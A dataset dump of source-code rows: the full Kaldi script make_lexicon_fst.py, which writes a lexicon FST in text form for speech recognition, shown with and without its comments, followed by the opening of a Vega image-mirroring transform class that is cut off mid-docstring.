Dataset schema, one row per source file (⌀ marks columns that may be null):
hexsha: string (length 40) | size: int64 (4 to 996k) | ext: string (8 classes) | lang: string (1 class)
max_stars_repo_path: string (4 to 245) | max_stars_repo_name: string (6 to 130) | max_stars_repo_head_hexsha: string (length 40) | max_stars_repo_licenses: list (1 to 10) | max_stars_count: int64 (1 to 191k) ⌀ | max_stars_repo_stars_event_min_datetime: string (length 24) ⌀ | max_stars_repo_stars_event_max_datetime: string (length 24) ⌀
max_issues_repo_path: string (4 to 245) | max_issues_repo_name: string (6 to 130) | max_issues_repo_head_hexsha: string (length 40) | max_issues_repo_licenses: list (1 to 10) | max_issues_count: int64 (1 to 67k) ⌀ | max_issues_repo_issues_event_min_datetime: string (length 24) ⌀ | max_issues_repo_issues_event_max_datetime: string (length 24) ⌀
max_forks_repo_path: string (4 to 245) | max_forks_repo_name: string (6 to 130) | max_forks_repo_head_hexsha: string (length 40) | max_forks_repo_licenses: list (1 to 10) | max_forks_count: int64 (1 to 105k) ⌀ | max_forks_repo_forks_event_min_datetime: string (length 24) ⌀ | max_forks_repo_forks_event_max_datetime: string (length 24) ⌀
content: string (4 to 996k) | avg_line_length: float64 (1.33 to 58.2k) | max_line_length: int64 (2 to 323k) | alphanum_fraction: float64 (0 to 0.97) | content_no_comment: string (0 to 946k) | is_comment_constant_removed: bool (2 classes) | is_sharp_comment_removed: bool (1 class)
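To make the schema concrete, here is a minimal sketch of loading rows with this layout and inspecting a few columns; the Parquet file name is hypothetical, and only pandas (with a Parquet engine such as pyarrow) is assumed.

import pandas as pd

# Load one exported shard of the dump (the file name is an assumption for illustration).
df = pd.read_parquet("code_dump.parquet")

# The 32 columns listed above: hexsha, size, ext, lang, content, ...
print(df.columns.tolist())

# Peek at repository names, file sizes and star counts for the first rows.
print(df[["max_stars_repo_name", "size", "max_stars_count"]].head())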
hexsha: 790af2f23140922bac8d9d20a58e89a9cdc76d25 | size: 19,129 | ext: py | lang: Python
max_stars_repo: egs/wsj/s5/utils/lang/make_lexicon_fst.py | shuipi100/kaldi @ 8e30fddb300a87e7c79ef2c0b9c731a8a9fd23f0 | licenses: ["Apache-2.0"] | max_stars_count: 74 | stars events: 2017-01-10T21:27:24.000Z to 2022-03-05T07:30:30.000Z
max_issues_repo: egs/wsj/s5/utils/lang/make_lexicon_fst.py | shuipi100/kaldi @ 8e30fddb300a87e7c79ef2c0b9c731a8a9fd23f0 | licenses: ["Apache-2.0"] | max_issues_count: 55 | issues events: 2020-10-20T02:18:56.000Z to 2021-07-26T04:52:23.000Z
max_forks_repo: egs/wsj/s5/utils/lang/make_lexicon_fst.py | shuipi100/kaldi @ 8e30fddb300a87e7c79ef2c0b9c731a8a9fd23f0 | licenses: ["Apache-2.0"] | max_forks_count: 28 | forks events: 2017-01-23T10:49:04.000Z to 2022-03-05T07:30:21.000Z
content:
#!/usr/bin/env python3
# Copyright 2018 Johns Hopkins University (author: Daniel Povey)
# Apache 2.0.
# see get_args() below for usage message.
import argparse
import os
import sys
import math
import re
# The use of latin-1 encoding does not preclude reading utf-8. latin-1
# encoding means "treat words as sequences of bytes", and it is compatible
# with utf-8 encoding as well as other encodings such as gbk, as long as the
# spaces are also spaces in ascii (which we check). It is basically how we
# emulate the behavior of python before python3.
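# (Illustrative aside, not part of the original script: because latin-1 maps
# every byte value 0-255 to a distinct code point, decoding utf-8 text as
# latin-1 and encoding it back preserves the underlying bytes unchanged, e.g.
# "日本語".encode("utf-8").decode("latin-1").encode("latin-1").decode("utf-8")
# round-trips to "日本語".)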
sys.stdout = open(1, 'w', encoding='latin-1', closefd=False)
sys.stderr = open(2, 'w', encoding='latin-1', closefd=False)
def get_args():
parser = argparse.ArgumentParser(description="""This script creates the
text form of a lexicon FST, to be compiled by fstcompile using the
appropriate symbol tables (phones.txt and words.txt). It will mostly
be invoked indirectly via utils/prepare_lang.sh. The output goes to
the stdout.""")
parser.add_argument('--sil-phone', dest='sil_phone', type=str,
help="""Text form of optional-silence phone, e.g. 'SIL'. See also
the --sil-prob option.""")
parser.add_argument('--sil-prob', dest='sil_prob', type=float, default=0.0,
help="""Probability of silence between words (including at the
beginning and end of word sequences). Must be in the range [0.0, 1.0].
This refers to the optional silence inserted by the lexicon; see
the --sil-phone option.""")
parser.add_argument('--sil-disambig', dest='sil_disambig', type=str,
help="""Disambiguation symbol to disambiguate silence, e.g. #5.
Will only be supplied if you are creating the version of L.fst
with disambiguation symbols, intended for use with cyclic G.fst.
This symbol was introduced to fix a rather obscure source of
nondeterminism of CLG.fst, that has to do with reordering of
disambiguation symbols and phone symbols.""")
parser.add_argument('--left-context-phones', dest='left_context_phones', type=str,
help="""Only relevant if --nonterminals is also supplied; this relates
to grammar decoding (see http://kaldi-asr.org/doc/grammar.html or
src/doc/grammar.dox). Format is a list of left-context phones,
in text form, one per line. E.g. data/lang/phones/left_context_phones.txt""")
parser.add_argument('--nonterminals', type=str,
help="""If supplied, --left-context-phones must also be supplied.
List of user-defined nonterminal symbols such as #nonterm:contact_list,
one per line. E.g. data/local/dict/nonterminals.txt.""")
parser.add_argument('lexiconp', type=str,
help="""Filename of lexicon with pronunciation probabilities
(normally lexiconp.txt), with lines of the form 'word prob p1 p2...',
e.g. 'a 1.0 ay'""")
args = parser.parse_args()
return args
def read_lexiconp(filename):
"""Reads the lexiconp.txt file in 'filename', with lines like 'word pron p1 p2 ...'.
Returns a list of tuples (word, pron_prob, pron), where 'word' is a string,
'pron_prob', a float, is the pronunciation probability (which must be >0.0
and would normally be <=1.0), and 'pron' is a list of strings representing phones.
An element in the returned list might be ('hello', 1.0, ['h', 'eh', 'l', 'ow']).
"""
ans = []
found_empty_prons = False
found_large_pronprobs = False
# See the comment near the top of this file, RE why we use latin-1.
with open(filename, 'r', encoding='latin-1') as f:
whitespace = re.compile("[ \t]+")
for line in f:
a = whitespace.split(line.strip(" \t\r\n"))
if len(a) < 2:
print("{0}: error: found bad line '{1}' in lexicon file {2} ".format(
sys.argv[0], line.strip(" \t\r\n"), filename), file=sys.stderr)
sys.exit(1)
word = a[0]
if word == "<eps>":
# This would clash with the epsilon symbol normally used in OpenFst.
print("{0}: error: found <eps> as a word in lexicon file "
"{1}".format(line.strip(" \t\r\n"), filename), file=sys.stderr)
sys.exit(1)
try:
pron_prob = float(a[1])
except:
print("{0}: error: found bad line '{1}' in lexicon file {2}, 2nd field "
"should be pron-prob".format(sys.argv[0], line.strip(" \t\r\n"), filename),
file=sys.stderr)
sys.exit(1)
prons = a[2:]
if pron_prob <= 0.0:
print("{0}: error: invalid pron-prob in line '{1}' of lexicon file {1} ".format(
sys.argv[0], line.strip(" \t\r\n"), filename), file=sys.stderr)
sys.exit(1)
if len(prons) == 0:
found_empty_prons = True
ans.append( (word, pron_prob, prons) )
if pron_prob > 1.0:
found_large_pronprobs = True
if found_empty_prons:
print("{0}: warning: found at least one word with an empty pronunciation "
"in lexicon file {1}.".format(sys.argv[0], filename),
file=sys.stderr)
if found_large_pronprobs:
print("{0}: warning: found at least one word with pron-prob >1.0 "
"in {1}".format(sys.argv[0], filename), file=sys.stderr)
if len(ans) == 0:
print("{0}: error: found no pronunciations in lexicon file {1}".format(
sys.argv[0], filename), file=sys.stderr)
sys.exit(1)
return ans
def write_nonterminal_arcs(start_state, loop_state, next_state,
nonterminals, left_context_phones):
"""This function relates to the grammar-decoding setup, see
kaldi-asr.org/doc/grammar.html. It is called from write_fst_no_silence
and write_fst_with_silence, and writes to the stdout some extra arcs
in the lexicon FST that relate to nonterminal symbols.
See the section "Special symbols in L.fst",
kaldi-asr.org/doc/grammar.html#grammar_special_l.
start_state: the start-state of L.fst.
loop_state: the state of high out-degree in L.fst where words leave
and enter.
next_state: the number from which this function can start allocating its
own states. the updated value of next_state will be returned.
nonterminals: the user-defined nonterminal symbols as a list of
strings, e.g. ['#nonterm:contact_list', ... ].
left_context_phones: a list of phones that may appear as left-context,
e.g. ['a', 'ah', ... '#nonterm_bos'].
"""
shared_state = next_state
next_state += 1
final_state = next_state
next_state += 1
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=start_state, dest=shared_state,
phone='#nonterm_begin', word='#nonterm_begin',
cost=0.0))
for nonterminal in nonterminals:
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=loop_state, dest=shared_state,
phone=nonterminal, word=nonterminal,
cost=0.0))
# this_cost equals log(len(left_context_phones)) but the expression below
# better captures the meaning. Applying this cost to arcs keeps the FST
# stochastic (sum-to-one, like an HMM), so that if we do weight pushing
# things won't get weird. In the grammar-FST code when we splice things
# together we will cancel out this cost, see the function CombineArcs().
this_cost = -math.log(1.0 / len(left_context_phones))
for left_context_phone in left_context_phones:
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=shared_state, dest=loop_state,
phone=left_context_phone, word='<eps>', cost=this_cost))
# arc from loop-state to a final-state with #nonterm_end as ilabel and olabel
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=loop_state, dest=final_state,
phone='#nonterm_end', word='#nonterm_end', cost=0.0))
print("{state}\t{final_cost}".format(
state=final_state, final_cost=0.0))
return next_state
def write_fst_no_silence(lexicon, nonterminals=None, left_context_phones=None):
"""Writes the text format of L.fst to the standard output. This version is for
when --sil-prob=0.0, meaning there is no optional silence allowed.
'lexicon' is a list of 3-tuples (word, pron-prob, prons) as returned by
read_lexiconp().
'nonterminals', which relates to grammar decoding (see kaldi-asr.org/doc/grammar.html),
is either None, or the user-defined nonterminal symbols as a list of
strings, e.g. ['#nonterm:contact_list', ... ].
'left_context_phones', which also relates to grammar decoding and must be
supplied if 'nonterminals' is supplied, is either None or a list of
phones that may appear as left-context, e.g. ['a', 'ah', ... '#nonterm_bos'].
"""
loop_state = 0
next_state = 1 # the next un-allocated state, will be incremented as we go.
for (word, pronprob, pron) in lexicon:
cost = -math.log(pronprob)
cur_state = loop_state
for i in range(len(pron) - 1):
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=next_state,
phone=pron[i],
word=(word if i == 0 else '<eps>'),
cost=(cost if i == 0 else 0.0)))
cur_state = next_state
next_state += 1
i = len(pron) - 1 # note: i == -1 if pron is empty.
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=loop_state,
phone=(pron[i] if i >= 0 else '<eps>'),
word=(word if i <= 0 else '<eps>'),
cost=(cost if i <= 0 else 0.0)))
if nonterminals is not None:
next_state = write_nonterminal_arcs(
loop_state, loop_state, next_state,
nonterminals, left_context_phones)
print("{state}\t{final_cost}".format(
state=loop_state,
final_cost=0.0))
def write_fst_with_silence(lexicon, sil_prob, sil_phone, sil_disambig,
nonterminals=None, left_context_phones=None):
"""Writes the text format of L.fst to the standard output. This version is for
when --sil-prob != 0.0, meaning there is optional silence
'lexicon' is a list of 3-tuples (word, pron-prob, prons)
as returned by read_lexiconp().
'sil_prob', which is expected to be strictly between 0.0 and 1.0, is the
probability of silence.
'sil_phone' is the silence phone, e.g. "SIL".
'sil_disambig' is either None, or the silence disambiguation symbol, e.g. "#5".
'nonterminals', which relates to grammar decoding (see kaldi-asr.org/doc/grammar.html),
is either None, or the user-defined nonterminal symbols as a list of
strings, e.g. ['#nonterm:contact_list', ... ].
'left_context_phones', which also relates to grammar decoding and must be
supplied if 'nonterminals' is supplied, is either None or a list of
phones that may appear as left-context, e.g. ['a', 'ah', ... '#nonterm_bos'].
"""
assert sil_prob > 0.0 and sil_prob < 1.0
sil_cost = -math.log(sil_prob)
no_sil_cost = -math.log(1.0 - sil_prob);
start_state = 0
loop_state = 1 # words enter and leave from here
sil_state = 2 # words terminate here when followed by silence; this state
# has a silence transition to loop_state.
next_state = 3 # the next un-allocated state, will be incremented as we go.
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=start_state, dest=loop_state,
phone='<eps>', word='<eps>', cost=no_sil_cost))
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=start_state, dest=sil_state,
phone='<eps>', word='<eps>', cost=sil_cost))
if sil_disambig is None:
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=sil_state, dest=loop_state,
phone=sil_phone, word='<eps>', cost=0.0))
else:
sil_disambig_state = next_state
next_state += 1
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=sil_state, dest=sil_disambig_state,
phone=sil_phone, word='<eps>', cost=0.0))
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=sil_disambig_state, dest=loop_state,
phone=sil_disambig, word='<eps>', cost=0.0))
for (word, pronprob, pron) in lexicon:
pron_cost = -math.log(pronprob)
cur_state = loop_state
for i in range(len(pron) - 1):
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state, dest=next_state,
phone=pron[i],
word=(word if i == 0 else '<eps>'),
cost=(pron_cost if i == 0 else 0.0)))
cur_state = next_state
next_state += 1
i = len(pron) - 1 # note: i == -1 if pron is empty.
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=loop_state,
phone=(pron[i] if i >= 0 else '<eps>'),
word=(word if i <= 0 else '<eps>'),
cost=no_sil_cost + (pron_cost if i <= 0 else 0.0)))
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=sil_state,
phone=(pron[i] if i >= 0 else '<eps>'),
word=(word if i <= 0 else '<eps>'),
cost=sil_cost + (pron_cost if i <= 0 else 0.0)))
if nonterminals is not None:
next_state = write_nonterminal_arcs(
start_state, loop_state, next_state,
nonterminals, left_context_phones)
print("{state}\t{final_cost}".format(
state=loop_state,
final_cost=0.0))
def write_words_txt(orig_lines, highest_numbered_symbol, nonterminals, filename):
"""Writes updated words.txt to 'filename'. 'orig_lines' is the original lines
in the words.txt file as a list of strings (without the newlines);
highest_numbered_symbol is the highest numbered symbol in the original
words.txt; nonterminals is a list of strings like '#nonterm:foo'."""
with open(filename, 'w', encoding='latin-1') as f:
for l in orig_lines:
print(l, file=f)
cur_symbol = highest_numbered_symbol + 1
for n in [ '#nonterm_begin', '#nonterm_end' ] + nonterminals:
print("{0} {1}".format(n, cur_symbol), file=f)
cur_symbol = cur_symbol + 1
def read_nonterminals(filename):
"""Reads the user-defined nonterminal symbols in 'filename', checks that
it has the expected format and has no duplicates, and returns the nonterminal
symbols as a list of strings, e.g.
['#nonterm:contact_list', '#nonterm:phone_number', ... ]. """
ans = [line.strip(" \t\r\n") for line in open(filename, 'r', encoding='latin-1')]
if len(ans) == 0:
raise RuntimeError("The file {0} contains no nonterminals symbols.".format(filename))
for nonterm in ans:
if nonterm[:9] != '#nonterm:':
raise RuntimeError("In file '{0}', expected nonterminal symbols to start with '#nonterm:', found '{1}'"
.format(filename, nonterm))
if len(set(ans)) != len(ans):
raise RuntimeError("Duplicate nonterminal symbols are present in file {0}".format(filename))
return ans
def read_left_context_phones(filename):
"""Reads, checks, and returns a list of left-context phones, in text form, one
per line. Returns a list of strings, e.g. ['a', 'ah', ..., '#nonterm_bos' ]"""
ans = [line.strip(" \t\r\n") for line in open(filename, 'r', encoding='latin-1')]
if len(ans) == 0:
raise RuntimeError("The file {0} contains no left-context phones.".format(filename))
whitespace = re.compile("[ \t]+")
for s in ans:
if len(whitespace.split(s)) != 1:
raise RuntimeError("The file {0} contains an invalid line '{1}'".format(filename, s) )
if len(set(ans)) != len(ans):
raise RuntimeError("Duplicate nonterminal symbols are present in file {0}".format(filename))
return ans
def is_token(s):
"""Returns true if s is a string and is space-free."""
if not isinstance(s, str):
return False
whitespace = re.compile("[ \t\r\n]+")
split_str = whitespace.split(s);
return len(split_str) == 1 and s == split_str[0]
def main():
args = get_args()
lexicon = read_lexiconp(args.lexiconp)
if args.nonterminals is None:
nonterminals, left_context_phones = None, None
else:
if args.left_context_phones is None:
print("{0}: if --nonterminals is specified, --left-context-phones must also "
"be specified".format(sys.argv[0]))
sys.exit(1)
nonterminals = read_nonterminals(args.nonterminals)
left_context_phones = read_left_context_phones(args.left_context_phones)
if args.sil_prob == 0.0:
write_fst_no_silence(lexicon,
nonterminals=nonterminals,
left_context_phones=left_context_phones)
else:
# Do some checking that the options make sense.
if args.sil_prob < 0.0 or args.sil_prob >= 1.0:
print("{0}: invalid value specified --sil-prob={1}".format(
sys.argv[0], args.sil_prob), file=sys.stderr)
sys.exit(1)
if not is_token(args.sil_phone):
print("{0}: you specified --sil-prob={1} but --sil-phone is set "
"to '{2}'".format(sys.argv[0], args.sil_prob, args.sil_phone),
file=sys.stderr)
sys.exit(1)
if args.sil_disambig is not None and not is_token(args.sil_disambig):
print("{0}: invalid value --sil-disambig='{1}' was specified."
"".format(sys.argv[0], args.sil_disambig), file=sys.stderr)
sys.exit(1)
write_fst_with_silence(lexicon, args.sil_prob, args.sil_phone,
args.sil_disambig,
nonterminals=nonterminals,
left_context_phones=left_context_phones)
# (lines, highest_symbol) = read_words_txt(args.input_words_txt)
# nonterminals = read_nonterminals(args.nonterminal_symbols_list)
# write_words_txt(lines, highest_symbol, nonterminals, args.output_words_txt)
if __name__ == '__main__':
main()
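As a worked illustration of the text format the script above emits (a sketch derived from write_fst_no_silence(), not taken from the Kaldi documentation): for a lexiconp.txt containing the single entry "hi 0.5 h iy" and --sil-prob=0.0, the output consists of tab-separated "src dest phone word cost" arcs plus a final-state line, roughly
0	1	h	hi	0.6931471805599453   (the pron-prob cost -log(0.5) rides on the first arc)
1	0	iy	<eps>	0.0
0	0.0
which fstcompile then compiles into the binary L.fst using phones.txt and words.txt.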
avg_line_length: 46.429612 | max_line_length: 115 | alphanum_fraction: 0.603429
content_no_comment:
import argparse
import os
import sys
import math
import re
sys.stdout = open(1, 'w', encoding='latin-1', closefd=False)
sys.stderr = open(2, 'w', encoding='latin-1', closefd=False)
def get_args():
parser = argparse.ArgumentParser(description="""This script creates the
text form of a lexicon FST, to be compiled by fstcompile using the
appropriate symbol tables (phones.txt and words.txt). It will mostly
be invoked indirectly via utils/prepare_lang.sh. The output goes to
the stdout.""")
parser.add_argument('--sil-phone', dest='sil_phone', type=str,
help="""Text form of optional-silence phone, e.g. 'SIL'. See also
the --sil-prob option.""")
parser.add_argument('--sil-prob', dest='sil_prob', type=float, default=0.0,
help="""Probability of silence between words (including at the
beginning and end of word sequences). Must be in the range [0.0, 1.0].
This refers to the optional silence inserted by the lexicon; see
the --sil-phone option.""")
parser.add_argument('--sil-disambig', dest='sil_disambig', type=str,
help="""Disambiguation symbol to disambiguate silence, e.g. #5.
Will only be supplied if you are creating the version of L.fst
with disambiguation symbols, intended for use with cyclic G.fst.
This symbol was introduced to fix a rather obscure source of
nondeterminism of CLG.fst, that has to do with reordering of
disambiguation symbols and phone symbols.""")
parser.add_argument('--left-context-phones', dest='left_context_phones', type=str,
help="""Only relevant if --nonterminals is also supplied; this relates
to grammar decoding (see http://kaldi-asr.org/doc/grammar.html or
src/doc/grammar.dox). Format is a list of left-context phones,
in text form, one per line. E.g. data/lang/phones/left_context_phones.txt""")
parser.add_argument('--nonterminals', type=str,
help="""If supplied, --left-context-phones must also be supplied.
List of user-defined nonterminal symbols such as #nonterm:contact_list,
one per line. E.g. data/local/dict/nonterminals.txt.""")
parser.add_argument('lexiconp', type=str,
help="""Filename of lexicon with pronunciation probabilities
(normally lexiconp.txt), with lines of the form 'word prob p1 p2...',
e.g. 'a 1.0 ay'""")
args = parser.parse_args()
return args
def read_lexiconp(filename):
ans = []
found_empty_prons = False
found_large_pronprobs = False
with open(filename, 'r', encoding='latin-1') as f:
whitespace = re.compile("[ \t]+")
for line in f:
a = whitespace.split(line.strip(" \t\r\n"))
if len(a) < 2:
print("{0}: error: found bad line '{1}' in lexicon file {2} ".format(
sys.argv[0], line.strip(" \t\r\n"), filename), file=sys.stderr)
sys.exit(1)
word = a[0]
if word == "<eps>":
print("{0}: error: found <eps> as a word in lexicon file "
"{1}".format(line.strip(" \t\r\n"), filename), file=sys.stderr)
sys.exit(1)
try:
pron_prob = float(a[1])
except:
print("{0}: error: found bad line '{1}' in lexicon file {2}, 2nd field "
"should be pron-prob".format(sys.argv[0], line.strip(" \t\r\n"), filename),
file=sys.stderr)
sys.exit(1)
prons = a[2:]
if pron_prob <= 0.0:
print("{0}: error: invalid pron-prob in line '{1}' of lexicon file {1} ".format(
sys.argv[0], line.strip(" \t\r\n"), filename), file=sys.stderr)
sys.exit(1)
if len(prons) == 0:
found_empty_prons = True
ans.append( (word, pron_prob, prons) )
if pron_prob > 1.0:
found_large_pronprobs = True
if found_empty_prons:
print("{0}: warning: found at least one word with an empty pronunciation "
"in lexicon file {1}.".format(sys.argv[0], filename),
file=sys.stderr)
if found_large_pronprobs:
print("{0}: warning: found at least one word with pron-prob >1.0 "
"in {1}".format(sys.argv[0], filename), file=sys.stderr)
if len(ans) == 0:
print("{0}: error: found no pronunciations in lexicon file {1}".format(
sys.argv[0], filename), file=sys.stderr)
sys.exit(1)
return ans
def write_nonterminal_arcs(start_state, loop_state, next_state,
nonterminals, left_context_phones):
shared_state = next_state
next_state += 1
final_state = next_state
next_state += 1
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=start_state, dest=shared_state,
phone='#nonterm_begin', word='#nonterm_begin',
cost=0.0))
for nonterminal in nonterminals:
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=loop_state, dest=shared_state,
phone=nonterminal, word=nonterminal,
cost=0.0))
# together we will cancel out this cost, see the function CombineArcs().
this_cost = -math.log(1.0 / len(left_context_phones))
for left_context_phone in left_context_phones:
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=shared_state, dest=loop_state,
phone=left_context_phone, word='<eps>', cost=this_cost))
# arc from loop-state to a final-state with #nonterm_end as ilabel and olabel
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=loop_state, dest=final_state,
phone='#nonterm_end', word='#nonterm_end', cost=0.0))
print("{state}\t{final_cost}".format(
state=final_state, final_cost=0.0))
return next_state
def write_fst_no_silence(lexicon, nonterminals=None, left_context_phones=None):
loop_state = 0
next_state = 1 # the next un-allocated state, will be incremented as we go.
for (word, pronprob, pron) in lexicon:
cost = -math.log(pronprob)
cur_state = loop_state
for i in range(len(pron) - 1):
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=next_state,
phone=pron[i],
word=(word if i == 0 else '<eps>'),
cost=(cost if i == 0 else 0.0)))
cur_state = next_state
next_state += 1
i = len(pron) - 1 # note: i == -1 if pron is empty.
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=loop_state,
phone=(pron[i] if i >= 0 else '<eps>'),
word=(word if i <= 0 else '<eps>'),
cost=(cost if i <= 0 else 0.0)))
if nonterminals is not None:
next_state = write_nonterminal_arcs(
loop_state, loop_state, next_state,
nonterminals, left_context_phones)
print("{state}\t{final_cost}".format(
state=loop_state,
final_cost=0.0))
def write_fst_with_silence(lexicon, sil_prob, sil_phone, sil_disambig,
nonterminals=None, left_context_phones=None):
assert sil_prob > 0.0 and sil_prob < 1.0
sil_cost = -math.log(sil_prob)
no_sil_cost = -math.log(1.0 - sil_prob);
start_state = 0
loop_state = 1 # words enter and leave from here
sil_state = 2 # words terminate here when followed by silence; this state
# has a silence transition to loop_state.
next_state = 3 # the next un-allocated state, will be incremented as we go.
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=start_state, dest=loop_state,
phone='<eps>', word='<eps>', cost=no_sil_cost))
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=start_state, dest=sil_state,
phone='<eps>', word='<eps>', cost=sil_cost))
if sil_disambig is None:
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=sil_state, dest=loop_state,
phone=sil_phone, word='<eps>', cost=0.0))
else:
sil_disambig_state = next_state
next_state += 1
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=sil_state, dest=sil_disambig_state,
phone=sil_phone, word='<eps>', cost=0.0))
print('{src}\t{dest}\t{phone}\t{word}\t{cost}'.format(
src=sil_disambig_state, dest=loop_state,
phone=sil_disambig, word='<eps>', cost=0.0))
for (word, pronprob, pron) in lexicon:
pron_cost = -math.log(pronprob)
cur_state = loop_state
for i in range(len(pron) - 1):
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state, dest=next_state,
phone=pron[i],
word=(word if i == 0 else '<eps>'),
cost=(pron_cost if i == 0 else 0.0)))
cur_state = next_state
next_state += 1
i = len(pron) - 1 # note: i == -1 if pron is empty.
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=loop_state,
phone=(pron[i] if i >= 0 else '<eps>'),
word=(word if i <= 0 else '<eps>'),
cost=no_sil_cost + (pron_cost if i <= 0 else 0.0)))
print("{src}\t{dest}\t{phone}\t{word}\t{cost}".format(
src=cur_state,
dest=sil_state,
phone=(pron[i] if i >= 0 else '<eps>'),
word=(word if i <= 0 else '<eps>'),
cost=sil_cost + (pron_cost if i <= 0 else 0.0)))
if nonterminals is not None:
next_state = write_nonterminal_arcs(
start_state, loop_state, next_state,
nonterminals, left_context_phones)
print("{state}\t{final_cost}".format(
state=loop_state,
final_cost=0.0))
def write_words_txt(orig_lines, highest_numbered_symbol, nonterminals, filename):
with open(filename, 'w', encoding='latin-1') as f:
for l in orig_lines:
print(l, file=f)
cur_symbol = highest_numbered_symbol + 1
for n in [ '#nonterm_begin', '#nonterm_end' ] + nonterminals:
print("{0} {1}".format(n, cur_symbol), file=f)
cur_symbol = cur_symbol + 1
def read_nonterminals(filename):
ans = [line.strip(" \t\r\n") for line in open(filename, 'r', encoding='latin-1')]
if len(ans) == 0:
raise RuntimeError("The file {0} contains no nonterminals symbols.".format(filename))
for nonterm in ans:
if nonterm[:9] != '#nonterm:':
raise RuntimeError("In file '{0}', expected nonterminal symbols to start with '#nonterm:', found '{1}'"
.format(filename, nonterm))
if len(set(ans)) != len(ans):
raise RuntimeError("Duplicate nonterminal symbols are present in file {0}".format(filename))
return ans
def read_left_context_phones(filename):
ans = [line.strip(" \t\r\n") for line in open(filename, 'r', encoding='latin-1')]
if len(ans) == 0:
raise RuntimeError("The file {0} contains no left-context phones.".format(filename))
whitespace = re.compile("[ \t]+")
for s in ans:
if len(whitespace.split(s)) != 1:
raise RuntimeError("The file {0} contains an invalid line '{1}'".format(filename, s) )
if len(set(ans)) != len(ans):
raise RuntimeError("Duplicate nonterminal symbols are present in file {0}".format(filename))
return ans
def is_token(s):
if not isinstance(s, str):
return False
whitespace = re.compile("[ \t\r\n]+")
split_str = whitespace.split(s);
return len(split_str) == 1 and s == split_str[0]
def main():
args = get_args()
lexicon = read_lexiconp(args.lexiconp)
if args.nonterminals is None:
nonterminals, left_context_phones = None, None
else:
if args.left_context_phones is None:
print("{0}: if --nonterminals is specified, --left-context-phones must also "
"be specified".format(sys.argv[0]))
sys.exit(1)
nonterminals = read_nonterminals(args.nonterminals)
left_context_phones = read_left_context_phones(args.left_context_phones)
if args.sil_prob == 0.0:
write_fst_no_silence(lexicon,
nonterminals=nonterminals,
left_context_phones=left_context_phones)
else:
# Do some checking that the options make sense.
if args.sil_prob < 0.0 or args.sil_prob >= 1.0:
print("{0}: invalid value specified --sil-prob={1}".format(
sys.argv[0], args.sil_prob), file=sys.stderr)
sys.exit(1)
if not is_token(args.sil_phone):
print("{0}: you specified --sil-prob={1} but --sil-phone is set "
"to '{2}'".format(sys.argv[0], args.sil_prob, args.sil_phone),
file=sys.stderr)
sys.exit(1)
if args.sil_disambig is not None and not is_token(args.sil_disambig):
print("{0}: invalid value --sil-disambig='{1}' was specified."
"".format(sys.argv[0], args.sil_disambig), file=sys.stderr)
sys.exit(1)
write_fst_with_silence(lexicon, args.sil_prob, args.sil_phone,
args.sil_disambig,
nonterminals=nonterminals,
left_context_phones=left_context_phones)
# (lines, highest_symbol) = read_words_txt(args.input_words_txt)
# nonterminals = read_nonterminals(args.nonterminal_symbols_list)
# write_words_txt(lines, highest_symbol, nonterminals, args.output_words_txt)
if __name__ == '__main__':
main()
is_comment_constant_removed: true | is_sharp_comment_removed: true
hexsha: 790af397daafc9c5a23868ff8a12ad7ae0b28ccd | size: 1,710 | ext: py | lang: Python
max_stars_repo: vega/datasets/transforms/RandomMirrow_pair.py | jie311/vega @ 1bba6100ead802697e691403b951e6652a99ccae | licenses: ["MIT"] | max_stars_count: 724 | stars events: 2020-06-22T12:05:30.000Z to 2022-03-31T07:10:54.000Z
max_issues_repo: vega/datasets/transforms/RandomMirrow_pair.py | jie311/vega @ 1bba6100ead802697e691403b951e6652a99ccae | licenses: ["MIT"] | max_issues_count: 147 | issues events: 2020-06-30T13:34:46.000Z to 2022-03-29T11:30:17.000Z
max_forks_repo: vega/datasets/transforms/RandomMirrow_pair.py | jie311/vega @ 1bba6100ead802697e691403b951e6652a99ccae | licenses: ["MIT"] | max_forks_count: 160 | forks events: 2020-06-29T18:27:58.000Z to 2022-03-23T08:42:21.000Z
content:
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""This is a class for RandomMirrow_pair."""
import numpy as np
from vega.common import ClassFactory, ClassType
@ClassFactory.register(ClassType.TRANSFORM)
class RandomMirrow_pair(object):
"""Random mirrow two related image."""
def __call__(self, image, label):
"""Call function of RandomMirrow_pair.
:param image: usually the feature image, for example, the LR image for super solution dataset,
the initial image for the segmentation dataset, and etc
:type image: PIL image
:param label: usually the label image, for example, the HR image for super solution dataset,
